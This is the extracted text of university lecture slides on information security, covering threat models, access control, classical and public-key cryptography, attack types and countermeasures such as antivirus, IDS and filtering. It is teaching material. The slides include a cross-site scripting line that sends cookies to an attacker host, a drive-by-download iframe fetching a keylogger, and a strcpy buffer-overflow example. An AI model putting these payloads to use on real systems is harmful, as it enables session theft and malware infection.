A brief introduction to information security - Part II · Security threats Countering security...
Transcript of A brief introduction to information security - Part II · Security threats Countering security...
A brief introduction to information securityPart II
Tyler Moore
Computer Science & Engineering Department, SMU, Dallas, TX
Lecture 3
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Let’s recap last time
Safety vs. security
Information security protection goals1 Confidentiality: information is accessible only to authorized
parties2 Integrity: modification of information can be detected3 Availability: authorized parties can access information (and
use resources) when and where it is needed
Identification vs. authentication vs. authorization
Computer systems and networks
2 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Information security overview
Protection GoalsConfidentialityIntegrityAvailability
1. Engineer defenses
Satisfy goals2. Security threats
3. Countering security threats
3 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Engineered defenses to achieve protection goals
Protection GoalsConfidentialityIntegrityAvailability
1. Engineer defenses
Satisfy goals
5 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Threat models
All security is relative, but relative to what?
⇒ Threat models codify assumed adversary behavior
Threat models articulate assumed adversary behavior1 Goal: disrupting defender’s protection goals, make money,
wreak havoc2 Knowledge: does the attacker know how the defense works?3 Capabilities: Computational power available, time available to
target defenders, local vs. global eavesdropping, active vs.passive
Question: could a threat model be fully specified by assuminga certain level of financial resources available to the adversary?
6 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Access control
Recall claim from last class: authorization decision is thefundamental challenge of security engineering
Access control is how computer systems enforce authorizationdecisions
⇒ definition: ensuring that authorized user can access andmodify only those resources to which he is entitled
7 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
The rise of the superuser
Operating systems (OSes) separate processes that run the OSfrom processes run by users
OS processes have many powers – reading allcommunications, installing software, etc.
These powers can readily be abused by a malicious softwaredesigner
Solution: create a superuser that can have OS-levelcapabilities, constrain what regular users can do
8 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Operating System Security
KERNEL
P3
P2
P1
R1
R2
R3
Pi process i
Rj resource j
prevent side channelsand covert channels
enforce authorization decisionsfor inter-process communicationand resource access
direct access: MS DOS, MacOS 9, Win 3.11, 95, 98, ME,many embedded systems
secretkey
Same principle on higher layers: virtualization, sandboxes, . . .
9 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Principle of least privilege
Principle of least privilege: any file or process should be assignedthe minimum level of permissions needed in order to completerequired task
+ Limits the damage a process can cause others
- Conflicts with desire to make systems easy-to-use andadaptable
Question: what incentive conflict does a programmer facewhen requesting privileges?
10 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Cryptography
Protecting information on a computer system is necessary butnot sufficient to meet protection goals
Must also protect communications between systems
Cryptography (crypto for short) can be used to ensureconfidentiality and integrity of communications
12 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Recall the broker example from last time
Broker Exchange
〈BUY,200,GOOG,$600.25〉
13 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Crypto traditionally refers to Alice and Bob
Alice Bob
I love your music
Eve Mallory
hate
14 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Crypto B.C.
Julius Caesar enciphered messages by shiftingletters by three
Those receiving the message knew to shiftback
Plaintext: THISISIMPORTANT
Caesar
Secret key: DDDDDDDDDDDDDDD
Ciphertext: WKLVLVLPSRUWDQW
15 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Vigenere cipher
Shift each letter by a different amount, repeating after n letters
Plaintext: THISISIMPORTANT
Vigenere
Secret key: DABDABDABDABDAB
Ciphertext: WHJVITLMQRRUDNU
16 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
One-time pad
Shift each letter by a different amount, never repeating
Plaintext: THISISIMPORTANT
One-time pad
Secret key: DABHJIZXEBTULQP
Ciphertext: WHJZRAHJTPKNLDI
Question: what is the key length?
17 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Symmetric cryptography
Alice
Bob
{I love your music}kAB
Keydistribution
center
kABkAB
18 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Symmetric cryptography
Instead of a word, secret keys in modern symmetric encryptionsystems (e.g., AES) are stored as random sequences of bits
Keys are short relative to the message (unless using aone-time pad)
Limiting factor: distributing a shared secret to both partiesbefore communicating securely
19 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Perils of long keys: Russian one-time pad
Source: Marcus Ranum/MI5
20 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Asymmetric cryptography (aka public-key cryptography)
Huge breakthrough: communicating parties do not need toshare a secret key in advance
Trick: use one-way functions that are easy to compute butdifficult to reverse
Rather than a shared secret, generate a key pair
KA−1 : public key to encrypt messagesKA: private key to decrypt messages
Private keys kept secret, but public keys can be told toeveryone
Keys are tied to individuals, not pairs of individuals
⇒ n key pairs for n peopleQuestion: how many symmetric keys would be needed for npeople to communicate?
21 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Asymmetric cryptography: protecting confidentiality
Alice
Bob
Broadcast KB−1
{I love your music}KB−1
Decrypt message{{I love your music}kB−1}KB
22 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Asymmetric cryptography: protecting integrity
Alice
Bob
Broadcast KA−1
{I love your music}KA
Decrypt message{{I love your music}kA}KA−1
23 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Using asymmetric crypto to distribute symmetric keys
BobAmazon
0. Publish public key KA−1 to C.A.
1. Look up Amazon’s public keyKA−1
2. Choose session key KBA,encrypt and send {KBA}KA−1
3. Decrypt {{KBA}KA−1}KA
usingprivate keyKA
4. {Request payment}KBA
5. {Credit Card #}KBA
24 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Threat modelsAccess control for system securityCryptography for communication security
Why crypto is still hard in practice
Key management is hard to get right
⇒ Establishing public-key infrastructure tying identifiers to keyshas proved elusive
Configuring systems can be difficult
⇒ Coordinating the distribution of information such as publickeys before communication is inconvenient
Cryptosystems are often brittle and do not fail gracefully
25 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Security threats
Protection GoalsConfidentialityIntegrityAvailability
1. Engineer defenses
Satisfy goals2. Security threats
27 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Security threats: assumptions gone awry
System vulnerabilities: violate engineering assumptions
Cryptanalysis: violate physical or mathematical assumptions
People just don’t behave as designers expect
Violate assumptions about attacker behaviorViolate assumptions about defender behavior
28 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Privilege-escalation attacks
Recall that operating systems separate privileged data andprograms from normal files and processes
Only superusers are allowed to execute sensitive andpotentially harmful operations
Privilege-escalation attack: take on the role of superuser tocarry out unauthorized actions (e.g., installing malicioussoftware or reading sensitive files)
Adversaries exploit “bugs” to carry out attacks
29 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Buffer Overflow
Example function in C:
i n t p a r s e ( char ∗ msg ){ char tmp [ 1 0 0 0 ] ;
s t r c p y ( tmp , msg ) ;. . . // do morer e t u r n 0 ;
}
Strings are zero-delimited arrays:”test” → 0x74 65 73 74 00
Function strcpy cannot know the sizeof the destination buffer tmp.
Stack of the x86 architecture:
return address
local variables
add
ress
spac
e
&tmp[0]
&tmp[1000]
1001st to 1004th characteroverwrite return address
malicious code
User-provided code is executed with the privileges of the host program.
30 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Cross Site Scripting
client A web server
client B
attacker B
post user comment
post malformed user commentinitiate session
receive session ID
store ascookie
...
access user-generated content
retrieve B’s posting
execute B’s code in client A
steal A’s session ID
...
impersonate A
<script>
document.write(’’<img src=\’’http://www.mal.ru/’’+encodeURI(document.cookie)+’’\’’>’’);</script>
31 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Code-injection attacks on xkcd
32 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Drive-by-download attacks
Work in a similar manner to cross-site scripting, but actuallygain write access to the web server
Insert embedded links to malicious websites that downloadlinks automatically
⇒ <iframe height=‘‘1’’ width=‘‘1’’
src=‘‘http://evil.ru/keylogger.exe’’></iframe>
Question: how would encryption help preventdrive-by-download attacks or code-injection attacks?
33 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Where attacks take place
ISP 1 ISP 2
switchend-user PC
router router
Web server
Attacker
1: directly target end user
spam
spam
2:
eave
sdro
p
Malicious server
3: host malware
4: insert malware
34 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Cryptanalysis
Goal of cryptanalysis: descramble ciphertext without knowingthe decryption key
Simplest approach: brute force
Key of length ` bits ⇒ 2`−1 guessesFor AES-128, ` = 128, so brute force requires 2127 attempts(100 times a trillion times a trillion times a trillion)
Cryptanalysts look for shortcuts (so that 2k guesses required,where k < `
What do the shortcuts look like?
Mathematical assumptions can failLook for patterns in ciphertext (i.e., loss of randomness)
35 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Distribution of letters in English
36 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Kerckhoffs’ Principle
Cryptographic algorithms mustbe public. Security depends onlyon the secrecy of the keys.
Rationales:– avoid blind trust– more eyes find more flaws– err on the side of caution– changing keys is easier than
changing the system– the only reasonable assumption to
protect a public infrastructure
→ No security by obscurity
37 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
What can happen if you ignore Kerckhoffs
Source: http://www.schneier.com/blog/archives/2008/08/hacking_mifare.html
38 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Do cryptanalysts have the right threat model?
Adi Shamir
Cryptography is usually bypassed. I amnot aware of any major world-classsecurity system employing cryptographyin which the hackers penetrated thesystem by actually going through thecryptanalysis. [. . . ] Usually there aremuch simpler ways of penetrating thesecurity system.
39 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Most attackers bypass the threat model
This shouldn’t be surprising: a well-engineered system will bedesigned so that the attacks they planned for are hard to carryout
Threat models can go wrong in two ways1 Ascribe too much power to an attacker or focus too much on a
particular mode of attack
⇒ Leads to “over-engineering” and over-investment in defensesagainst certain threats
2 Miss attacks by not accounting for behaviors and capabilities
40 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Threat model adopted by cryptanalysts fail on both counts
Often overestimates attacker capability (focus on nation-stateas adversary)
Singular focus on decrypting ciphertext without access to theencryption key ignores how most attacks take place
Much cheaper for an attacker to find a way to recover the key
41 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Cold-boot attacks recover keys stored in volatile memory
Source: https://citp.princeton.edu/research/memory/
42 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Users don’t always behave as system designers envision
Many successful attacks trick users into sharing keys andpasswords
Systems security is predicated on users only taking actionsthat are in their own interest
⇒ Makes their job tractable⇒ Offloads the hard decision of whether to allow untrusted
software to execute onto the end user
43 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior
Prompts condition users to ignore security warnings
44 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Countering security threats
Protection GoalsConfidentialityIntegrityAvailability
1. Engineer defenses
Satisfy goals2. Security threats
3. Countering security threats
46 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Countering security threats
When weaknesses are discovered in security defenses,defenders have two choices
1 Make fundamental changes to defenses2 Counter the attacks directly
First approach could lead to improved security in the long run,but it is slow
Second approach is reactive, but more responsive1 Ex post countermeasures: counter attacks and flaws after they
are encountered2 Ex ante countermeasures: counter flaws before an attack is
realized
47 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Ex post countermeasure: antivirus software
Most common ex post countermeasure
Checks for “signatures” of malicious executables running on asystem
Database constantly growing to check for newly discoveredmalware
Cohen proved that detecting viruses in general reduces to thehalting problem
⇒ AV software likely to remain a step behind virus writers
48 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Ex post countermeasure: intrusion detection systems
IDSes look for attacks taking place on the network
Rule-based systems check for known attack patternsAnomaly-based systems check for deviations from “good”traffic patterns
Challenges for IDSes
Internet is noisy – distinguishing malice from incompetence isnon-trivialFalse positives can undermine the system when true attacksare rare
49 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Ex post countermeasure: intrusion detection systems
Suppose there are 10 true attacks for every one millionnetwork sessions
1% false positive rate ⇒ 10, 000 false positives per one millionsessions
1000:1 ratio of false positives to true positives
50 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Ex post countermeasure: filters
Filters are popular tool to block unwanted traffic
Usually operate at either network or application layer
Network layer is more efficient, but less granular (e.g., blockoutgoing port 25 trafic, allow incoming port 80)Application layer is more granular (e.g., block unwantedURLs), but easier to circumvent and raises privacy concerns
Ingress vs. egress filtering
Ingress filtering can give false sense of security – many harmsemanate from within a networkEgress filtering protects against outgoing harm – when mightyou want that?
51 / 54
Notes
Notes
Notes
Notes
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Where defenses are placed
ISP 1 ISP 2
switchend-user PC
router router
Web server
Attacker
1: directly target end user
spam
spam
2:
eave
sdro
p
Malicious server
3: host malware
4: insert malware
Defense
antivirus
firewall
blacklist
Defense
IDS
firewall
app. relay
Defense
IDS
firewall
Input validation
52 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Considerations for where to defend
Technical considerations
Hard (and sometimes illegal!) to do application level filteringat ISPsWeb servers should do input validation for maximum coverage
Economic considerations
Consider these attack scenarios: discuss which stakeholdershave incentive to defend
1 Spam coming from an infected computer2 Website hacked to distribute drive-by-download3 Website vulnerable to input-validation attack that steals server
data
53 / 54
Engineered defenses to achieve protection goalsSecurity threats
Countering security threats
Ex post countermeasuresEx ante countermeasures
Ex ante countermeasure
Can be more proactive in defense, taking action before anincident happens
Compliance mechanisms (e.g., audit, penetration testing) lookfor configuration flaws before attackers do
Fundamental changes to the security infrastructure (e.g.,Microsoft’s effort to improve security during softwaredevelopment)
Key issue: do you incur small certain cost now or larger butmore uncertain cost later?
54 / 54
Notes
Notes
Notes
Notes